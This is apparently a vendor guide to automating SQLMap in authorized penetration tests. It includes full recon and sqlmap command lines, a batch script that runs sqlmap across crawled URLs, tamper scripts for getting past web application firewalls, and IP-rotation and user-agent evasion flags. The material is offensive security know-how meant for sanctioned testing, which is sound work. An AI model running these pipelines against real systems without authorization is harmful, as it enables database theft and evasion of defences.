Authorized testing only — use against systems you own or have explicit written permission to test.

SQLMap Automation

Q: What is SQLMap used for in penetration testing?

SQLMap is an open-source tool that automates the detection and exploitation of SQL injection vulnerabilities. In penetration testing, it is used after parameter discovery to confirm injectable endpoints and extract database contents in a controlled, authorized test environment.

Q: How do you automate SQLMap in a recon pipeline?

SQLMap automation works by chaining it after parameter discovery tools like FFUF or Arjun. Discovered endpoints and parameter names are passed to SQLMap via -u, -r (request file), or --forms flags. Output is saved to structured directories using --output-dir for later analysis.

Q: How do you prevent SQLMap from triggering rate limits or bans?

Use --delay to add seconds between requests, --threads to cap concurrency (1–3 for sensitive targets), --random-agent to rotate User-Agent headers, and --tor or --proxy for IP rotation. Always coordinate with the target's rules of engagement before running aggressive scan modes.

Q: Is SQLMap legal to use?

SQLMap is legal only when used against systems you own or have explicit written authorization to test. Unauthorized use against third-party systems is illegal under computer fraud laws in most jurisdictions. Always obtain a scope agreement or bug bounty program rules before running SQLMap.

SQLMap is the industry-standard tool for detecting and exploiting SQL injection vulnerabilities in authorized penetration tests. When used correctly — as a post-discovery stage in a structured offensive workflow — it transforms manual injection testing from hours of labor into a reproducible, auditable automated process. This guide covers practitioner-grade SQLMap automation: how to target parameters precisely, configure tamper scripts, control threading, manage output, and chain SQLMap with upstream tools like FFUF and Nuclei.

Why Manual SQL Injection Testing Breaks at Scale

Modern web applications expose hundreds of endpoints across subdomains, APIs, and legacy paths. Manually testing each parameter for SQL injection is not feasible when a target scope includes dozens of hosts. The failure modes of ad-hoc testing are well understood by anyone who has run a real engagement:

Coverage gaps — parameters discovered late in the engagement often never get tested
Inconsistent payloads — manual testers vary in which injection syntax they attempt
No structured output — findings live in terminal scrollback instead of organized files
Context loss — returning to a host hours later means re-discovering what was already tested
WAF triggering — unthrottled manual testing triggers lockouts before the test completes

The correct architecture treats SQLMap not as a weapon fired at a target, but as a post-discovery validation stage that runs precisely against parameters already confirmed to exist and accept user input.

How Automation Improves SQL Injection Testing

Automation solves the scale and consistency problems while adding a layer of operational discipline that manual testing rarely achieves. Specifically, a structured SQLMap automation workflow provides:

Deterministic coverage — every discovered parameter gets tested with the same payload set
Reproducible results — re-running the same command against the same target produces the same output structure
Auditable logs — timestamped session files document exactly what was tested and when
Controlled noise — delay and threading flags keep the test within the target's acceptable request rate
Pipeline continuity — SQLMap output feeds directly into reporting and retesting workflows

The shift from manual to automated SQLMap usage is not about removing human judgment — it is about reserving human judgment for the stages that require it: parameter selection, payload tuning, and result interpretation.

Example Workflow: Parameter Discovery to SQLMap Execution

The following pipeline reflects a real post-discovery SQLMap automation chain. Each stage produces output that feeds directly into the next.

Subfinder

→

httpx

→

FFUF / Katana

→

Parameter Discovery

→

Manual Validation

→

SQLMap

⚠ SQLMap should only run against endpoints validated to be in scope and confirmed to accept user-controlled input. Never point SQLMap at a URL list without manual review first.

Step 1 — Enumerate live hosts and URLs

Begin with subdomain enumeration and HTTP probing to build a list of live, reachable hosts within scope.

bash — host enumeration

# Enumerate subdomains and probe for live HTTP services
subfinder -d target.com -silent | httpx -silent -status-code -no-color \
  | grep "200\|301\|302\|403" \
  | awk '{print $1}' > live_hosts.txt

Step 2 — Discover URLs with parameters

Use Katana or FFUF to crawl live hosts and surface URLs that contain query parameters. Parameters are the injection surface — without this step, SQLMap has nothing precise to target.

bash — URL and parameter discovery

# Crawl with Katana and filter for parameterized URLs
katana -list live_hosts.txt -silent -jc -kf all \
  | grep "=" \
  | sort -u > parameterized_urls.txt

# Optional: use Arjun for deeper parameter mining
arjun -i live_hosts.txt -oJ arjun_params.json --stable

Step 3 — Manual review and scoping

Before running SQLMap, review parameterized_urls.txt and remove any endpoints outside your authorized scope, admin paths you are not cleared to test, and any URLs with parameters that clearly do not accept DB-backed input (e.g., static asset paths, tracking pixels). This review step is non-negotiable.

Step 4 — Run SQLMap against a single validated target

Start with a single high-confidence endpoint before running batch mode. This confirms your flags are correct and lets you observe the detection behavior.

bash — single target SQLMap run

# Basic detection run against a validated parameterized URL
sqlmap \
  -u "https://target.com/search?q=test&category=1" \
  --batch \
  --level=3 \
  --risk=2 \
  --threads=2 \
  --delay=1 \
  --random-agent \
  --output-dir="./sqlmap-output/target.com" \
  --forms \
  -v 1

Flag guidance: --level controls test depth (1–5); level 3 covers headers and cookies. --risk controls payload aggressiveness (1–3); risk 2 avoids heavy time-based payloads that cause false positives. --batch auto-accepts all prompts — essential for scripted runs.

Step 5 — Run SQLMap from a request file (recommended for complex endpoints)

For authenticated endpoints, POST requests, or APIs with custom headers, capture the raw HTTP request in Burp Suite or with curl -v and pass it to SQLMap with the -r flag. This is the most reliable method for complex targets.

bash — request file mode

# Save raw HTTP request to a file (e.g., from Burp Suite Repeater)
# request.txt content:
#   POST /api/v1/search HTTP/1.1
#   Host: target.com
#   Authorization: Bearer <token>
#   Content-Type: application/json
#
#   {"query":"test","category":1}

sqlmap \
  -r request.txt \
  --batch \
  --level=3 \
  --risk=2 \
  --threads=2 \
  --delay=1 \
  --random-agent \
  --tamper="space2comment,between" \
  --output-dir="./sqlmap-output/api-endpoint" \
  -v 1

Step 6 — Batch execution across a validated URL list

Once single-target testing is confirmed to work correctly, loop over the validated URL list. Add per-host output directories and logging.

bash — batch SQLMap pipeline

#!/usr/bin/env bash
# SQLMap batch execution — authorized targets only
# Usage: ./sqlmap-batch.sh parameterized_urls.txt

set -euo pipefail

OUT_DIR="./sqlmap-output"
URL_LIST="${1:-parameterized_urls.txt}"
LOG_FILE="${OUT_DIR}/batch-run.log"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

mkdir -p "${OUT_DIR}"

echo "[${TIMESTAMP}] Starting batch SQLMap run" | tee "${LOG_FILE}"
echo "[${TIMESTAMP}] Target list: ${URL_LIST}" | tee -a "${LOG_FILE}"

while IFS= read -r URL; do
  if [[ -z "${URL}" || "${URL}" == \#* ]]; then continue; fi

  HOST=$(echo "${URL}" | awk -F/ '{print $3}')
  HOST_DIR="${OUT_DIR}/${HOST}"
  mkdir -p "${HOST_DIR}"

  echo "[$(date +%H:%M:%S)] Testing: ${URL}" | tee -a "${LOG_FILE}"

  sqlmap \
    -u "${URL}" \
    --batch \
    --level=3 \
    --risk=2 \
    --threads=2 \
    --delay=1 \
    --random-agent \
    --output-dir="${HOST_DIR}" \
    -v 1 \
    2>&1 | tee -a "${LOG_FILE}"

  echo "[$(date +%H:%M:%S)] Done: ${URL}" | tee -a "${LOG_FILE}"

done < "${URL_LIST}"

echo "[$(date +%H:%M:%S)] Batch run complete. Output in: ${OUT_DIR}" | tee -a "${LOG_FILE}"

Tamper Scripts — Bypassing WAFs and Input Filters

When a target has a WAF or application-level input filter blocking standard SQLMap payloads, tamper scripts modify the injection syntax before it is sent. The table below covers the most operationally useful tamper scripts for real engagements.

Tamper Script	What It Does	When to Use
space2comment	Replaces spaces with SQL comments (`/**/`)	WAFs blocking space-delimited SQL keywords
between	Replaces `>` with `NOT BETWEEN 0 AND`	Filters on comparison operators
charunicodeencode	Unicode-encodes non-alphanumeric characters	WAFs doing basic ASCII matching
randomcase	Randomizes keyword casing (`SeLeCt`)	Case-sensitive keyword filters
equaltolike	Replaces `=` with `LIKE`	Equality operator filtering
base64encode	Base64-encodes the full payload	Applications that decode base64 input server-side
apostrophemask	Replaces apostrophe with UTF-8 full-width variant	Quote-filtering WAFs

bash — combining tamper scripts

# Chain multiple tamper scripts with comma separation
sqlmap \
  -u "https://target.com/page?id=1" \
  --batch \
  --tamper="space2comment,between,randomcase" \
  --random-agent \
  --level=3 \
  --risk=2 \
  --delay=1.5 \
  --output-dir="./sqlmap-output/waf-bypass"

Threading and Rate Limiting — Staying Within Scope Constraints

Aggressive SQLMap runs trigger WAF bans, overwhelm small application servers, and violate the rules of engagement on most bug bounty programs. The flags below give you precise control over request rate.

Flag	Effect	Recommended Value
--threads	Concurrent request count	1–3 for sensitive targets, up to 5 for permissive scopes
--delay	Seconds between requests	1–2 for standard runs; 3+ for restricted scopes
--timeout	Per-request timeout in seconds	30 (prevents hanging on slow responses)
--retries	Retry count on connection failure	2 (avoid hammering unstable targets)
--random-agent	Rotates User-Agent header per request	Always enabled
--proxy	Routes through HTTP/SOCKS proxy	Use for IP rotation or local Burp capture

How PhantomRed Automates SQLMap Workflows

Manually constructing and running these pipelines for every engagement is time-consuming and error-prone. PhantomRed's recon workflow generator produces executable shell scripts that chain the entire offensive stack — Subfinder, httpx, FFUF, Nuclei, and SQLMap — into a single reproducible pipeline, with structured output directories, timestamped logs, dependency checks, and scope warnings built in from the start.

Instead of remembering every flag combination and writing fresh scripts for each engagement, you configure the target scope once and the generator produces a complete, ready-to-execute workflow. Saved Workflow History lets you reload previous configurations, compare approaches across engagements, and iterate on what worked.

For deeper background on how PhantomRed approaches autonomous penetration testing as a discipline, see the autonomous penetration testing overview.

Output Management — Structured Evidence for Reporting

SQLMap produces verbose output by default. Without structure, findings get buried in terminal scrollback and are difficult to include in reports. The recommended pattern uses a directory layout that mirrors the engagement scope:

output directory structure

sqlmap-output/
├── target.com/
│   ├── target.com/          # SQLMap session files per host
│   │   ├── log              # Human-readable finding log
│   │   ├── session.sqlite   # Session state for --resume
│   │   └── target.com.csv   # Optional CSV dump
├── api.target.com/
│   └── api.target.com/
└── batch-run.log            # Master log of all tested URLs

Use --resume to continue an interrupted scan without re-testing already-covered parameters — essential for long-running batch runs against large scopes.

bash — resume interrupted scan

# Resume a previous session
sqlmap \
  -u "https://target.com/search?q=test" \
  --batch \
  --output-dir="./sqlmap-output/target.com" \
  --resume

Benefits of Automated SQLMap Workflows

Complete Parameter Coverage

Every parameter in scope gets tested with a consistent payload set — no manual gaps.

Reproducible Engagements

The same script reruns against the same target weeks later, enabling regression testing after remediations.

Auditable Evidence Chain

Timestamped logs and structured output files document exactly what was tested, when, and with which payloads.

Controlled Engagement Noise

Threading and delay flags keep request rates within program rules and avoid triggering lockouts.

Pipeline Integration

SQLMap plugs into the same shell pipeline as Subfinder, FFUF, and Nuclei — no manual handoffs between tools.

Workflow Continuity

Session files and output directories survive interruptions — resume exactly where the scan stopped.

Frequently Asked Questions

What is SQLMap used for in penetration testing?

SQLMap automates detection and exploitation of SQL injection vulnerabilities in authorized penetration tests. It is used after parameter discovery to confirm injectable endpoints and extract database contents under a controlled, written-permission-based engagement.

How do you automate SQLMap in a recon pipeline?

Chain SQLMap after parameter discovery tools like FFUF or Arjun. Discovered endpoints and parameter names feed into SQLMap via -u, -r (raw request file), or --forms flags. Batch execution loops over a validated URL list and saves output to structured directories using --output-dir.

What are SQLMap tamper scripts and when should you use them?

Tamper scripts modify payloads before injection to bypass WAFs and input filters. Common scripts include space2comment (replaces spaces with SQL comments), between (rewrites comparison operators), and charunicodeencode (Unicode-encodes characters). Use them when standard payloads are blocked by WAF signatures.

How do you prevent SQLMap from triggering rate limits or bans?

Use --delay to add seconds between requests, --threads to cap concurrency (1–3 for sensitive targets), --random-agent to rotate User-Agent headers, and --proxy for IP rotation. Always align request rate with the target's rules of engagement before running.

Is SQLMap legal to use?

SQLMap is legal only against systems you own or have explicit written authorization to test. Unauthorized use against third-party systems is illegal under computer fraud laws in most jurisdictions. Always obtain a scope agreement or confirm bug bounty program rules before running SQLMap against any target.

How does PhantomRed integrate SQLMap into automated workflows?

PhantomRed's recon workflow generator produces executable shell scripts that chain Subfinder, httpx, FFUF, Nuclei, and SQLMap into a single orchestrated pipeline. Each stage feeds validated endpoints to the next, with structured output directories, timestamped logs, and dependency checks built in automatically.

Generate Your SQLMap Workflow

Build a complete, executable shell script that chains subdomain enumeration, HTTP probing, parameter discovery, and SQLMap into one reproducible pipeline.

Open Workflow Generator →

No account required. Export as .sh and run immediately.